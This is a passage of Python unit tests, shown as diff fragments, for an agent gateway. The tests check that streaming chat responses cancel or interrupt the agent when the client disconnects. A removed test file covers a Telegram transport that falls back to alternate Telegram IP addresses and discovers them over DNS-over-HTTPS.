from unittest.mock import AsyncMock, MagicMock, patch
|
||||
|
||||
import pytest
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Helpers
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
def _make_adapter():
|
||||
"""Build a minimal APIServerAdapter with mocked internals."""
|
||||
from gateway.platforms.api_server import APIServerAdapter
|
||||
from gateway.config import PlatformConfig
|
||||
|
||||
config = PlatformConfig(enabled=True, token="test-key")
|
||||
adapter = APIServerAdapter(config)
|
||||
return adapter
|
||||
|
||||
|
||||
def _make_request():
|
||||
"""Build a mock aiohttp request."""
|
||||
req = MagicMock()
|
||||
req.headers = {}
|
||||
return req
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Tests
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
class TestSSEAgentCancelOnDisconnect:
|
||||
"""gateway/platforms/api_server.py — _write_sse_chat_completion()"""
|
||||
|
||||
def test_agent_task_cancelled_on_client_disconnect(self):
|
||||
"""When response.write raises ConnectionResetError (client dropped),
|
||||
the agent task must be cancelled."""
|
||||
adapter = _make_adapter()
|
||||
|
||||
stream_q = queue.Queue()
|
||||
stream_q.put("hello ") # Some data already queued
|
||||
|
||||
# Agent task that runs forever (simulates a long LLM call)
|
||||
agent_done = asyncio.Event()
|
||||
|
||||
async def fake_agent():
|
||||
await agent_done.wait()
|
||||
return {"final_response": "done"}, {"input_tokens": 10, "output_tokens": 5, "total_tokens": 15}
|
||||
|
||||
async def run():
|
||||
from aiohttp import web
|
||||
|
||||
agent_task = asyncio.ensure_future(fake_agent())
|
||||
|
||||
# Mock response that raises ConnectionResetError on second write
|
||||
mock_response = AsyncMock(spec=web.StreamResponse)
|
||||
call_count = 0
|
||||
|
||||
async def write_side_effect(data):
|
||||
nonlocal call_count
|
||||
call_count += 1
|
||||
if call_count >= 2:
|
||||
raise ConnectionResetError("client disconnected")
|
||||
|
||||
mock_response.write = AsyncMock(side_effect=write_side_effect)
|
||||
mock_response.prepare = AsyncMock()
|
||||
|
||||
with patch.object(type(adapter), '_write_sse_chat_completion',
|
||||
adapter._write_sse_chat_completion):
|
||||
# Patch StreamResponse creation
|
||||
with patch("gateway.platforms.api_server.web.StreamResponse",
|
||||
return_value=mock_response):
|
||||
await adapter._write_sse_chat_completion(
|
||||
_make_request(), "cmpl-123", "gpt-4", 1234567890,
|
||||
stream_q, agent_task,
|
||||
)
|
||||
|
||||
# The critical assertion: agent_task must be cancelled
|
||||
assert agent_task.cancelled() or agent_task.done()
|
||||
# Clean up
|
||||
agent_done.set()
|
||||
|
||||
asyncio.run(run())
|
||||
|
||||
def test_agent_task_not_cancelled_on_normal_completion(self):
|
||||
"""On normal stream completion, agent task should NOT be cancelled."""
|
||||
adapter = _make_adapter()
|
||||
|
||||
stream_q = queue.Queue()
|
||||
stream_q.put("hello")
|
||||
stream_q.put(None) # End-of-stream sentinel
|
||||
|
||||
async def fake_agent():
|
||||
return {"final_response": "done"}, {"input_tokens": 10, "output_tokens": 5, "total_tokens": 15}
|
||||
|
||||
async def run():
|
||||
from aiohttp import web
|
||||
|
||||
agent_task = asyncio.ensure_future(fake_agent())
|
||||
await asyncio.sleep(0) # Let agent complete
|
||||
|
||||
mock_response = AsyncMock(spec=web.StreamResponse)
|
||||
mock_response.write = AsyncMock()
|
||||
mock_response.prepare = AsyncMock()
|
||||
|
||||
with patch("gateway.platforms.api_server.web.StreamResponse",
|
||||
return_value=mock_response):
|
||||
await adapter._write_sse_chat_completion(
|
||||
_make_request(), "cmpl-456", "gpt-4", 1234567890,
|
||||
stream_q, agent_task,
|
||||
)
|
||||
|
||||
# Agent should have completed normally, not been cancelled
|
||||
assert agent_task.done()
|
||||
assert not agent_task.cancelled()
|
||||
|
||||
asyncio.run(run())
|
||||
|
||||
def test_broken_pipe_also_cancels_agent(self):
|
||||
"""BrokenPipeError (another disconnect variant) also cancels the task."""
|
||||
adapter = _make_adapter()
|
||||
|
||||
stream_q = queue.Queue()
|
||||
|
||||
async def fake_agent():
|
||||
await asyncio.sleep(999) # Never completes
|
||||
return {}, {}
|
||||
|
||||
async def run():
|
||||
from aiohttp import web
|
||||
|
||||
agent_task = asyncio.ensure_future(fake_agent())
|
||||
|
||||
mock_response = AsyncMock(spec=web.StreamResponse)
|
||||
mock_response.write = AsyncMock(side_effect=BrokenPipeError("pipe broken"))
|
||||
mock_response.prepare = AsyncMock()
|
||||
|
||||
with patch("gateway.platforms.api_server.web.StreamResponse",
|
||||
return_value=mock_response):
|
||||
await adapter._write_sse_chat_completion(
|
||||
_make_request(), "cmpl-789", "gpt-4", 1234567890,
|
||||
stream_q, agent_task,
|
||||
)
|
||||
|
||||
assert agent_task.cancelled() or agent_task.done()
|
||||
|
||||
asyncio.run(run())
|
||||
|
||||
def test_already_done_task_not_cancelled_on_disconnect(self):
|
||||
"""If agent already finished before disconnect, don't try to cancel."""
|
||||
adapter = _make_adapter()
|
||||
|
||||
stream_q = queue.Queue()
|
||||
stream_q.put("data")
|
||||
|
||||
async def fake_agent():
|
||||
return {"final_response": "done"}, {}
|
||||
|
||||
async def run():
|
||||
from aiohttp import web
|
||||
|
||||
agent_task = asyncio.ensure_future(fake_agent())
|
||||
await asyncio.sleep(0) # Let agent complete
|
||||
|
||||
mock_response = AsyncMock(spec=web.StreamResponse)
|
||||
call_count = 0
|
||||
|
||||
async def write_side_effect(data):
|
||||
nonlocal call_count
|
||||
call_count += 1
|
||||
if call_count >= 2:
|
||||
raise ConnectionResetError("late disconnect")
|
||||
|
||||
mock_response.write = AsyncMock(side_effect=write_side_effect)
|
||||
mock_response.prepare = AsyncMock()
|
||||
|
||||
with patch("gateway.platforms.api_server.web.StreamResponse",
|
||||
return_value=mock_response):
|
||||
await adapter._write_sse_chat_completion(
|
||||
_make_request(), "cmpl-done", "gpt-4", 1234567890,
|
||||
stream_q, agent_task,
|
||||
)
|
||||
|
||||
# Task was already done — should not be cancelled
|
||||
assert agent_task.done()
|
||||
assert not agent_task.cancelled()
|
||||
|
||||
asyncio.run(run())
|
||||
|
||||
def test_agent_interrupt_called_on_disconnect(self):
|
||||
"""When the client disconnects, agent.interrupt() must be called
|
||||
so the agent thread stops making LLM API calls."""
|
||||
adapter = _make_adapter()
|
||||
|
||||
stream_q = queue.Queue()
|
||||
stream_q.put("hello ")
|
||||
|
||||
agent_done = asyncio.Event()
|
||||
|
||||
async def fake_agent():
|
||||
await agent_done.wait()
|
||||
return {"final_response": "done"}, {}
|
||||
|
||||
# Mock agent with an interrupt method
|
||||
mock_agent = MagicMock()
|
||||
mock_agent.interrupt = MagicMock()
|
||||
|
||||
async def run():
|
||||
from aiohttp import web
|
||||
|
||||
agent_task = asyncio.ensure_future(fake_agent())
|
||||
agent_ref = [mock_agent]
|
||||
|
||||
mock_response = AsyncMock(spec=web.StreamResponse)
|
||||
call_count = 0
|
||||
|
||||
async def write_side_effect(data):
|
||||
nonlocal call_count
|
||||
call_count += 1
|
||||
if call_count >= 2:
|
||||
raise ConnectionResetError("client disconnected")
|
||||
|
||||
mock_response.write = AsyncMock(side_effect=write_side_effect)
|
||||
mock_response.prepare = AsyncMock()
|
||||
|
||||
with patch("gateway.platforms.api_server.web.StreamResponse",
|
||||
return_value=mock_response):
|
||||
await adapter._write_sse_chat_completion(
|
||||
_make_request(), "cmpl-int", "gpt-4", 1234567890,
|
||||
stream_q, agent_task, agent_ref,
|
||||
)
|
||||
|
||||
# agent.interrupt() must have been called
|
||||
mock_agent.interrupt.assert_called_once_with("SSE client disconnected")
|
||||
# Clean up
|
||||
agent_done.set()
|
||||
|
||||
asyncio.run(run())
|
||||
|
||||
def test_agent_ref_none_still_cancels_task(self):
|
||||
"""When agent_ref is not provided (None), the task is still cancelled
|
||||
on disconnect — just without the interrupt() call."""
|
||||
adapter = _make_adapter()
|
||||
|
||||
stream_q = queue.Queue()
|
||||
|
||||
async def fake_agent():
|
||||
await asyncio.sleep(999)
|
||||
return {}, {}
|
||||
|
||||
async def run():
|
||||
from aiohttp import web
|
||||
|
||||
agent_task = asyncio.ensure_future(fake_agent())
|
||||
|
||||
mock_response = AsyncMock(spec=web.StreamResponse)
|
||||
mock_response.write = AsyncMock(side_effect=BrokenPipeError("gone"))
|
||||
mock_response.prepare = AsyncMock()
|
||||
|
||||
with patch("gateway.platforms.api_server.web.StreamResponse",
|
||||
return_value=mock_response):
|
||||
# No agent_ref passed — should still handle disconnect cleanly
|
||||
await adapter._write_sse_chat_completion(
|
||||
_make_request(), "cmpl-noref", "gpt-4", 1234567890,
|
||||
stream_q, agent_task,
|
||||
)
|
||||
|
||||
assert agent_task.cancelled() or agent_task.done()
|
||||
|
||||
asyncio.run(run())
|
||||
@@ -20,7 +20,7 @@ def _ensure_telegram_mock():
|
||||
telegram_mod.constants.ChatType.CHANNEL = "channel"
|
||||
telegram_mod.constants.ChatType.PRIVATE = "private"
|
||||
|
||||
for name in ("telegram", "telegram.ext", "telegram.constants", "telegram.request"):
|
||||
for name in ("telegram", "telegram.ext", "telegram.constants"):
|
||||
sys.modules.setdefault(name, telegram_mod)
|
||||
|
||||
|
||||
@@ -29,14 +29,6 @@ _ensure_telegram_mock()
|
||||
from gateway.platforms.telegram import TelegramAdapter # noqa: E402
|
||||
|
||||
|
||||
@pytest.fixture(autouse=True)
|
||||
def _no_auto_discovery(monkeypatch):
|
||||
"""Disable DoH auto-discovery so connect() uses the plain builder chain."""
|
||||
async def _noop():
|
||||
return []
|
||||
monkeypatch.setattr("gateway.platforms.telegram.discover_fallback_ips", _noop)
|
||||
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_connect_rejects_same_host_token_lock(monkeypatch):
|
||||
adapter = TelegramAdapter(PlatformConfig(enabled=True, token="secret-token"))
|
||||
|
||||
@@ -45,7 +45,7 @@ def _ensure_telegram_mock():
|
||||
telegram_mod.constants.ChatType.CHANNEL = "channel"
|
||||
telegram_mod.constants.ChatType.PRIVATE = "private"
|
||||
|
||||
for name in ("telegram", "telegram.ext", "telegram.constants", "telegram.request"):
|
||||
for name in ("telegram", "telegram.ext", "telegram.constants"):
|
||||
sys.modules.setdefault(name, telegram_mod)
|
||||
|
||||
|
||||
|
||||
@@ -28,7 +28,7 @@ def _ensure_telegram_mock():
|
||||
mod.constants.ChatType.SUPERGROUP = "supergroup"
|
||||
mod.constants.ChatType.CHANNEL = "channel"
|
||||
mod.constants.ChatType.PRIVATE = "private"
|
||||
for name in ("telegram", "telegram.ext", "telegram.constants", "telegram.request"):
|
||||
for name in ("telegram", "telegram.ext", "telegram.constants"):
|
||||
sys.modules.setdefault(name, mod)
|
||||
|
||||
|
||||
|
||||
@@ -1,626 +0,0 @@
|
||||
"""Tests for gateway.platforms.telegram_network – fallback transport layer.
|
||||
|
||||
Background
|
||||
----------
|
||||
api.telegram.org resolves to an IP (e.g. 149.154.166.110) that is unreachable
|
||||
from some networks. The workaround: route TCP through a different IP in the
|
||||
same Telegram-owned 149.154.160.0/20 block (e.g. 149.154.167.220) while
|
||||
keeping TLS SNI and the Host header as api.telegram.org so Telegram's edge
|
||||
servers still accept the request. This is the programmatic equivalent of:
|
||||
|
||||
curl --resolve api.telegram.org:443:149.154.167.220 https://api.telegram.org/bot<token>/getMe
|
||||
|
||||
The TelegramFallbackTransport implements this: try the primary (DNS-resolved)
|
||||
path first, and on ConnectTimeout / ConnectError fall through to configured
|
||||
fallback IPs in order, then "stick" to whichever IP works.
|
||||
"""
|
||||
|
||||
import httpx
|
||||
import pytest
|
||||
|
||||
from gateway.platforms import telegram_network as tnet
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Helpers
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
class FakeTransport(httpx.AsyncBaseTransport):
|
||||
"""Records calls and raises / returns based on a host→action mapping."""
|
||||
|
||||
def __init__(self, calls, behavior):
|
||||
self.calls = calls
|
||||
self.behavior = behavior
|
||||
self.closed = False
|
||||
|
||||
async def handle_async_request(self, request: httpx.Request) -> httpx.Response:
|
||||
self.calls.append(
|
||||
{
|
||||
"url_host": request.url.host,
|
||||
"host_header": request.headers.get("host"),
|
||||
"sni_hostname": request.extensions.get("sni_hostname"),
|
||||
"path": request.url.path,
|
||||
}
|
||||
)
|
||||
action = self.behavior.get(request.url.host, "ok")
|
||||
if action == "timeout":
|
||||
raise httpx.ConnectTimeout("timed out")
|
||||
if action == "connect_error":
|
||||
raise httpx.ConnectError("connect error")
|
||||
if isinstance(action, Exception):
|
||||
raise action
|
||||
return httpx.Response(200, request=request, text="ok")
|
||||
|
||||
async def aclose(self) -> None:
|
||||
self.closed = True
|
||||
|
||||
|
||||
def _fake_transport_factory(calls, behavior):
|
||||
"""Returns a factory that creates FakeTransport instances."""
|
||||
instances = []
|
||||
|
||||
def factory(**kwargs):
|
||||
t = FakeTransport(calls, behavior)
|
||||
instances.append(t)
|
||||
return t
|
||||
|
||||
factory.instances = instances
|
||||
return factory
|
||||
|
||||
|
||||
def _telegram_request(path="/botTOKEN/getMe"):
|
||||
return httpx.Request("GET", f"https://api.telegram.org{path}")
|
||||
|
||||
|
||||
# ═══════════════════════════════════════════════════════════════════════════
|
||||
# IP parsing & validation
|
||||
# ═══════════════════════════════════════════════════════════════════════════
|
||||
|
||||
class TestParseFallbackIpEnv:
|
||||
def test_filters_invalid_and_ipv6(self, caplog):
|
||||
ips = tnet.parse_fallback_ip_env("149.154.167.220, bad, 2001:67c:4e8:f004::9,149.154.167.220")
|
||||
assert ips == ["149.154.167.220", "149.154.167.220"]
|
||||
assert "Ignoring invalid Telegram fallback IP" in caplog.text
|
||||
assert "Ignoring non-IPv4 Telegram fallback IP" in caplog.text
|
||||
|
||||
def test_none_returns_empty(self):
|
||||
assert tnet.parse_fallback_ip_env(None) == []
|
||||
|
||||
def test_empty_string_returns_empty(self):
|
||||
assert tnet.parse_fallback_ip_env("") == []
|
||||
|
||||
def test_whitespace_only_returns_empty(self):
|
||||
assert tnet.parse_fallback_ip_env(" , , ") == []
|
||||
|
||||
def test_single_valid_ip(self):
|
||||
assert tnet.parse_fallback_ip_env("149.154.167.220") == ["149.154.167.220"]
|
||||
|
||||
def test_multiple_valid_ips(self):
|
||||
ips = tnet.parse_fallback_ip_env("149.154.167.220, 149.154.167.221")
|
||||
assert ips == ["149.154.167.220", "149.154.167.221"]
|
||||
|
||||
def test_rejects_leading_zeros(self, caplog):
|
||||
"""Leading zeros are ambiguous (octal?) so ipaddress rejects them."""
|
||||
ips = tnet.parse_fallback_ip_env("149.154.167.010")
|
||||
assert ips == []
|
||||
assert "Ignoring invalid" in caplog.text
|
||||
|
||||
|
||||
class TestNormalizeFallbackIps:
|
||||
def test_deduplication_happens_at_transport_level(self):
|
||||
"""_normalize does not dedup; TelegramFallbackTransport.__init__ does."""
|
||||
raw = ["149.154.167.220", "149.154.167.220"]
|
||||
assert tnet._normalize_fallback_ips(raw) == ["149.154.167.220", "149.154.167.220"]
|
||||
|
||||
def test_empty_strings_skipped(self):
|
||||
assert tnet._normalize_fallback_ips(["", " ", "149.154.167.220"]) == ["149.154.167.220"]
|
||||
|
||||
|
||||
# ═══════════════════════════════════════════════════════════════════════════
|
||||
# Request rewriting
|
||||
# ═══════════════════════════════════════════════════════════════════════════
|
||||
|
||||
class TestRewriteRequestForIp:
|
||||
def test_preserves_host_and_sni(self):
|
||||
request = _telegram_request()
|
||||
rewritten = tnet._rewrite_request_for_ip(request, "149.154.167.220")
|
||||
|
||||
assert rewritten.url.host == "149.154.167.220"
|
||||
assert rewritten.headers["host"] == "api.telegram.org"
|
||||
assert rewritten.extensions["sni_hostname"] == "api.telegram.org"
|
||||
assert rewritten.url.path == "/botTOKEN/getMe"
|
||||
|
||||
def test_preserves_method_and_path(self):
|
||||
request = httpx.Request("POST", "https://api.telegram.org/botTOKEN/sendMessage")
|
||||
rewritten = tnet._rewrite_request_for_ip(request, "149.154.167.220")
|
||||
|
||||
assert rewritten.method == "POST"
|
||||
assert rewritten.url.path == "/botTOKEN/sendMessage"
|
||||
|
||||
|
||||
# ═══════════════════════════════════════════════════════════════════════════
|
||||
# Fallback transport – core behavior
|
||||
# ═══════════════════════════════════════════════════════════════════════════
|
||||
|
||||
class TestFallbackTransport:
|
||||
"""Primary path fails → try fallback IPs → stick to whichever works."""
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_falls_back_on_connect_timeout_and_becomes_sticky(self, monkeypatch):
|
||||
calls = []
|
||||
behavior = {"api.telegram.org": "timeout", "149.154.167.220": "ok"}
|
||||
monkeypatch.setattr(tnet.httpx, "AsyncHTTPTransport", _fake_transport_factory(calls, behavior))
|
||||
|
||||
transport = tnet.TelegramFallbackTransport(["149.154.167.220"])
|
||||
resp = await transport.handle_async_request(_telegram_request())
|
||||
|
||||
assert resp.status_code == 200
|
||||
assert transport._sticky_ip == "149.154.167.220"
|
||||
# First attempt was primary (api.telegram.org), second was fallback
|
||||
assert calls[0]["url_host"] == "api.telegram.org"
|
||||
assert calls[1]["url_host"] == "149.154.167.220"
|
||||
assert calls[1]["host_header"] == "api.telegram.org"
|
||||
assert calls[1]["sni_hostname"] == "api.telegram.org"
|
||||
|
||||
# Second request goes straight to sticky IP
|
||||
calls.clear()
|
||||
resp2 = await transport.handle_async_request(_telegram_request())
|
||||
assert resp2.status_code == 200
|
||||
assert calls[0]["url_host"] == "149.154.167.220"
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_falls_back_on_connect_error(self, monkeypatch):
|
||||
calls = []
|
||||
behavior = {"api.telegram.org": "connect_error", "149.154.167.220": "ok"}
|
||||
monkeypatch.setattr(tnet.httpx, "AsyncHTTPTransport", _fake_transport_factory(calls, behavior))
|
||||
|
||||
transport = tnet.TelegramFallbackTransport(["149.154.167.220"])
|
||||
resp = await transport.handle_async_request(_telegram_request())
|
||||
|
||||
assert resp.status_code == 200
|
||||
assert transport._sticky_ip == "149.154.167.220"
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_does_not_fallback_on_non_connect_error(self, monkeypatch):
|
||||
"""Errors like ReadTimeout are not connection issues — don't retry."""
|
||||
calls = []
|
||||
behavior = {"api.telegram.org": httpx.ReadTimeout("read timeout"), "149.154.167.220": "ok"}
|
||||
monkeypatch.setattr(tnet.httpx, "AsyncHTTPTransport", _fake_transport_factory(calls, behavior))
|
||||
|
||||
transport = tnet.TelegramFallbackTransport(["149.154.167.220"])
|
||||
|
||||
with pytest.raises(httpx.ReadTimeout):
|
||||
await transport.handle_async_request(_telegram_request())
|
||||
|
||||
assert [c["url_host"] for c in calls] == ["api.telegram.org"]
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_all_ips_fail_raises_last_error(self, monkeypatch):
|
||||
calls = []
|
||||
behavior = {"api.telegram.org": "timeout", "149.154.167.220": "timeout"}
|
||||
monkeypatch.setattr(tnet.httpx, "AsyncHTTPTransport", _fake_transport_factory(calls, behavior))
|
||||
|
||||
transport = tnet.TelegramFallbackTransport(["149.154.167.220"])
|
||||
|
||||
with pytest.raises(httpx.ConnectTimeout):
|
||||
await transport.handle_async_request(_telegram_request())
|
||||
|
||||
assert [c["url_host"] for c in calls] == ["api.telegram.org", "149.154.167.220"]
|
||||
assert transport._sticky_ip is None
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_multiple_fallback_ips_tried_in_order(self, monkeypatch):
|
||||
calls = []
|
||||
behavior = {
|
||||
"api.telegram.org": "timeout",
|
||||
"149.154.167.220": "timeout",
|
||||
"149.154.167.221": "ok",
|
||||
}
|
||||
monkeypatch.setattr(tnet.httpx, "AsyncHTTPTransport", _fake_transport_factory(calls, behavior))
|
||||
|
||||
transport = tnet.TelegramFallbackTransport(["149.154.167.220", "149.154.167.221"])
|
||||
resp = await transport.handle_async_request(_telegram_request())
|
||||
|
||||
assert resp.status_code == 200
|
||||
assert transport._sticky_ip == "149.154.167.221"
|
||||
assert [c["url_host"] for c in calls] == [
|
||||
"api.telegram.org",
|
||||
"149.154.167.220",
|
||||
"149.154.167.221",
|
||||
]
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_sticky_ip_tried_first_but_falls_through_if_stale(self, monkeypatch):
|
||||
"""If the sticky IP stops working, the transport retries others."""
|
||||
calls = []
|
||||
behavior = {
|
||||
"api.telegram.org": "timeout",
|
||||
"149.154.167.220": "ok",
|
||||
"149.154.167.221": "ok",
|
||||
}
|
||||
monkeypatch.setattr(tnet.httpx, "AsyncHTTPTransport", _fake_transport_factory(calls, behavior))
|
||||
|
||||
transport = tnet.TelegramFallbackTransport(["149.154.167.220", "149.154.167.221"])
|
||||
|
||||
# First request: primary fails → .220 works → becomes sticky
|
||||
await transport.handle_async_request(_telegram_request())
|
||||
assert transport._sticky_ip == "149.154.167.220"
|
||||
|
||||
# Now .220 goes bad too
|
||||
calls.clear()
|
||||
behavior["149.154.167.220"] = "timeout"
|
||||
|
||||
resp = await transport.handle_async_request(_telegram_request())
|
||||
assert resp.status_code == 200
|
||||
# Tried sticky (.220) first, then fell through to .221
|
||||
assert [c["url_host"] for c in calls] == ["149.154.167.220", "149.154.167.221"]
|
||||
assert transport._sticky_ip == "149.154.167.221"
|
||||
|
||||
|
||||
class TestFallbackTransportPassthrough:
|
||||
"""Requests that don't need fallback behavior."""
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_non_telegram_host_bypasses_fallback(self, monkeypatch):
|
||||
calls = []
|
||||
behavior = {}
|
||||
monkeypatch.setattr(tnet.httpx, "AsyncHTTPTransport", _fake_transport_factory(calls, behavior))
|
||||
|
||||
transport = tnet.TelegramFallbackTransport(["149.154.167.220"])
|
||||
request = httpx.Request("GET", "https://example.com/path")
|
||||
resp = await transport.handle_async_request(request)
|
||||
|
||||
assert resp.status_code == 200
|
||||
assert calls[0]["url_host"] == "example.com"
|
||||
assert transport._sticky_ip is None
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_empty_fallback_list_uses_primary_only(self, monkeypatch):
|
||||
calls = []
|
||||
behavior = {}
|
||||
monkeypatch.setattr(tnet.httpx, "AsyncHTTPTransport", _fake_transport_factory(calls, behavior))
|
||||
|
||||
transport = tnet.TelegramFallbackTransport([])
|
||||
resp = await transport.handle_async_request(_telegram_request())
|
||||
|
||||
assert resp.status_code == 200
|
||||
assert calls[0]["url_host"] == "api.telegram.org"
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_primary_succeeds_no_fallback_needed(self, monkeypatch):
|
||||
calls = []
|
||||
behavior = {"api.telegram.org": "ok"}
|
||||
monkeypatch.setattr(tnet.httpx, "AsyncHTTPTransport", _fake_transport_factory(calls, behavior))
|
||||
|
||||
transport = tnet.TelegramFallbackTransport(["149.154.167.220"])
|
||||
resp = await transport.handle_async_request(_telegram_request())
|
||||
|
||||
assert resp.status_code == 200
|
||||
assert transport._sticky_ip is None
|
||||
assert len(calls) == 1
|
||||
|
||||
|
||||
class TestFallbackTransportInit:
|
||||
def test_deduplicates_fallback_ips(self, monkeypatch):
|
||||
monkeypatch.setattr(
|
||||
tnet.httpx, "AsyncHTTPTransport", lambda **kw: FakeTransport([], {})
|
||||
)
|
||||
transport = tnet.TelegramFallbackTransport(["149.154.167.220", "149.154.167.220"])
|
||||
assert transport._fallback_ips == ["149.154.167.220"]
|
||||
|
||||
def test_filters_invalid_ips_at_init(self, monkeypatch):
|
||||
monkeypatch.setattr(
|
||||
tnet.httpx, "AsyncHTTPTransport", lambda **kw: FakeTransport([], {})
|
||||
)
|
||||
transport = tnet.TelegramFallbackTransport(["149.154.167.220", "not-an-ip"])
|
||||
assert transport._fallback_ips == ["149.154.167.220"]
|
||||
|
||||
|
||||
class TestFallbackTransportClose:
|
||||
@pytest.mark.asyncio
|
||||
async def test_aclose_closes_all_transports(self, monkeypatch):
|
||||
factory = _fake_transport_factory([], {})
|
||||
monkeypatch.setattr(tnet.httpx, "AsyncHTTPTransport", factory)
|
||||
|
||||
transport = tnet.TelegramFallbackTransport(["149.154.167.220", "149.154.167.221"])
|
||||
await transport.aclose()
|
||||
|
||||
# 1 primary + 2 fallback transports
|
||||
assert len(factory.instances) == 3
|
||||
assert all(t.closed for t in factory.instances)
|
||||
|
||||
|
||||
# ═══════════════════════════════════════════════════════════════════════════
|
||||
# Config layer – TELEGRAM_FALLBACK_IPS env → config.extra
|
||||
# ═══════════════════════════════════════════════════════════════════════════
|
||||
|
||||
class TestConfigFallbackIps:
|
||||
def test_env_var_populates_config_extra(self, monkeypatch):
|
||||
from gateway.config import GatewayConfig, Platform, PlatformConfig, _apply_env_overrides
|
||||
|
||||
monkeypatch.setenv("TELEGRAM_FALLBACK_IPS", "149.154.167.220,149.154.167.221")
|
||||
config = GatewayConfig(platforms={Platform.TELEGRAM: PlatformConfig(enabled=True, token="tok")})
|
||||
_apply_env_overrides(config)
|
||||
|
||||
assert config.platforms[Platform.TELEGRAM].extra["fallback_ips"] == [
|
||||
"149.154.167.220", "149.154.167.221",
|
||||
]
|
||||
|
||||
def test_env_var_creates_platform_if_missing(self, monkeypatch):
|
||||
from gateway.config import GatewayConfig, Platform, _apply_env_overrides
|
||||
|
||||
monkeypatch.setenv("TELEGRAM_FALLBACK_IPS", "149.154.167.220")
|
||||
config = GatewayConfig(platforms={})
|
||||
_apply_env_overrides(config)
|
||||
|
||||
assert Platform.TELEGRAM in config.platforms
|
||||
assert config.platforms[Platform.TELEGRAM].extra["fallback_ips"] == ["149.154.167.220"]
|
||||
|
||||
def test_env_var_strips_whitespace(self, monkeypatch):
|
||||
from gateway.config import GatewayConfig, Platform, PlatformConfig, _apply_env_overrides
|
||||
|
||||
monkeypatch.setenv("TELEGRAM_FALLBACK_IPS", " 149.154.167.220 , 149.154.167.221 ")
|
||||
config = GatewayConfig(platforms={Platform.TELEGRAM: PlatformConfig(enabled=True, token="tok")})
|
||||
_apply_env_overrides(config)
|
||||
|
||||
assert config.platforms[Platform.TELEGRAM].extra["fallback_ips"] == [
|
||||
"149.154.167.220", "149.154.167.221",
|
||||
]
|
||||
|
||||
def test_empty_env_var_does_not_populate(self, monkeypatch):
|
||||
from gateway.config import GatewayConfig, Platform, PlatformConfig, _apply_env_overrides
|
||||
|
||||
monkeypatch.setenv("TELEGRAM_FALLBACK_IPS", "")
|
||||
config = GatewayConfig(platforms={Platform.TELEGRAM: PlatformConfig(enabled=True, token="tok")})
|
||||
_apply_env_overrides(config)
|
||||
|
||||
assert "fallback_ips" not in config.platforms[Platform.TELEGRAM].extra
|
||||
|
||||
|
||||
# ═══════════════════════════════════════════════════════════════════════════
|
||||
# Adapter layer – _fallback_ips() reads config correctly
|
||||
# ═══════════════════════════════════════════════════════════════════════════
|
||||
|
||||
class TestAdapterFallbackIps:
|
||||
def _make_adapter(self, extra=None):
|
||||
import sys
|
||||
from unittest.mock import MagicMock
|
||||
|
||||
# Ensure telegram mock is in place
|
||||
if "telegram" not in sys.modules or not hasattr(sys.modules["telegram"], "__file__"):
|
||||
mod = MagicMock()
|
||||
mod.ext.ContextTypes.DEFAULT_TYPE = type(None)
|
||||
mod.constants.ParseMode.MARKDOWN_V2 = "MarkdownV2"
|
||||
mod.constants.ChatType.GROUP = "group"
|
||||
mod.constants.ChatType.SUPERGROUP = "supergroup"
|
||||
mod.constants.ChatType.CHANNEL = "channel"
|
||||
mod.constants.ChatType.PRIVATE = "private"
|
||||
for name in ("telegram", "telegram.ext", "telegram.constants", "telegram.request"):
|
||||
sys.modules.setdefault(name, mod)
|
||||
|
||||
from gateway.config import PlatformConfig
|
||||
from gateway.platforms.telegram import TelegramAdapter
|
||||
|
||||
config = PlatformConfig(enabled=True, token="test-token")
|
||||
if extra:
|
||||
config.extra.update(extra)
|
||||
return TelegramAdapter(config)
|
||||
|
||||
def test_list_in_extra(self):
|
||||
adapter = self._make_adapter(extra={"fallback_ips": ["149.154.167.220"]})
|
||||
assert adapter._fallback_ips() == ["149.154.167.220"]
|
||||
|
||||
def test_csv_string_in_extra(self):
|
||||
adapter = self._make_adapter(extra={"fallback_ips": "149.154.167.220,149.154.167.221"})
|
||||
assert adapter._fallback_ips() == ["149.154.167.220", "149.154.167.221"]
|
||||
|
||||
def test_empty_extra(self):
|
||||
adapter = self._make_adapter()
|
||||
assert adapter._fallback_ips() == []
|
||||
|
||||
def test_no_extra_attr(self):
|
||||
adapter = self._make_adapter()
|
||||
adapter.config.extra = None
|
||||
assert adapter._fallback_ips() == []
|
||||
|
||||
def test_invalid_ips_filtered(self):
|
||||
adapter = self._make_adapter(extra={"fallback_ips": ["149.154.167.220", "not-valid"]})
|
||||
assert adapter._fallback_ips() == ["149.154.167.220"]
|
||||
|
||||
|
||||
# ═══════════════════════════════════════════════════════════════════════════
|
||||
# DoH auto-discovery
|
||||
# ═══════════════════════════════════════════════════════════════════════════
|
||||
|
||||
def _doh_answer(*ips: str) -> dict:
|
||||
"""Build a minimal DoH JSON response with A records."""
|
||||
return {"Answer": [{"type": 1, "data": ip} for ip in ips]}
|
||||
|
||||
|
||||
class FakeDoHClient:
|
||||
"""Mock httpx.AsyncClient for DoH queries."""
|
||||
|
||||
def __init__(self, responses: dict):
|
||||
# responses: URL prefix → (status, json_body) | Exception
|
||||
self._responses = responses
|
||||
self.requests_made: list[dict] = []
|
||||
|
||||
@staticmethod
|
||||
def _make_response(status, body, url):
|
||||
"""Build an httpx.Response with a request attached (needed for raise_for_status)."""
|
||||
request = httpx.Request("GET", url)
|
||||
return httpx.Response(status, json=body, request=request)
|
||||
|
||||
async def get(self, url, *, params=None, headers=None, **kwargs):
|
||||
self.requests_made.append({"url": url, "params": params, "headers": headers})
|
||||
for prefix, action in self._responses.items():
|
||||
if url.startswith(prefix):
|
||||
if isinstance(action, Exception):
|
||||
